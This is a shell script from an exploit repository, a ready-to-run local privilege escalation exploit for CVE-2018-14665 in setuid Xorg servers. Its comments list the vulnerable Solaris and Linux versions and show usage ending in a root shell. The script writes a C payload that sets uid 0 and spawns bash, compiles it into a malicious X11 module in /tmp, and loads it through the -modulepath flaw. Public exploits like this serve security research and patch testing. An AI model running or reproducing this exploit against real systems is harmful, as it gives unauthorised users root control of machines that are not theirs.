Permalink
Cannot retrieve contributors at this time
#!/bin/sh | |
# | |
# raptor_xorgy - xorg-x11-server LPE via modulepath switch | |
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> | |
# | |
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission | |
# check for -modulepath and -logfile options when starting Xorg. X server | |
# allows unprivileged users with the ability to log in to the system via | |
# physical console to escalate their privileges and run arbitrary code under | |
# root privileges (CVE-2018-14665). | |
# | |
# This exploit variant triggers the bug in the -modulepath command line switch | |
# to load a malicious X11 module in order to escalate privileges to root on | |
# vulnerable systems. This technique is less invasive than exploiting the | |
# -logfile switch, however the gcc compiler must be present in order for it to | |
# work out of the box. Alternatively, you must use a pre-compiled malicious .so | |
# compatible with the target system and modify the exploit accordingly. | |
# | |
# It works very reliably on Solaris 11.4 and should work on most vulnerable | |
# Linux distributions (though I haven't tested it). It fails on OpenBSD due to | |
# their Xorg privilege separation (Xenocara). On this platform you should use | |
# raptor_xorgasm instead. | |
# | |
# Thanks to @alanc and @nushinde for discussing this alternative vector. | |
# | |
# See also: | |
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm | |
# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm | |
# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html | |
# https://nvd.nist.gov/vuln/detail/CVE-2006-0745 | |
# | |
# Usage: | |
# raptor@stalker:~$ chmod +x raptor_xorgy | |
# raptor@stalker:~$ ./raptor_xorgy | |
# [...] | |
# root@stalker:~# id | |
# uid=0(root) gid=0(root) | |
# | |
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): | |
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] | |
# Oracle Solaris 11 SPARC [untested] | |
# CentOS Linux 7 [untested] | |
# Red Hat Enterprise Linux 7 [untested] | |
# Ubuntu Linux 18.10 [untested] | |
# Ubuntu Linux 18.04 LTS [untested] | |
# Ubuntu Linux 16.04 LTS [untested] | |
# Debian GNU/Linux 9 [untested] | |
# [...] | |
# | |
echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch" | |
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>" | |
echo | |
# prepare the payload | |
cat << EOF > /tmp/pwned.c | |
_init() | |
{ | |
setuid(0); | |
setgid(0); | |
system("/bin/bash"); | |
} | |
EOF | |
# libglx.so should be a good target, refer to Xorg logs for other candidates | |
gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so | |
if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi | |
# trigger the bug | |
echo "Got root?" | |
Xorg -modulepath ",/tmp" :1 |